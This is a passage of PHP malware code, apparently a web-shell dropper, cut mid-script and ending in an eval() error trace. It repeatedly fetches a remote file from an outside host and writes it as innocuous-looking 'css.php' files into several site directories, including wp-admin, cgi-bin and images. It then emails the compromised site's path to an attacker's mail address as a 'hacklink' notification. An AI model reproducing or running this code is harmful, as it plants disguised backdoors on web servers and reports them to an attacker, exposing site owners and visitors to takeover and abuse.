"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1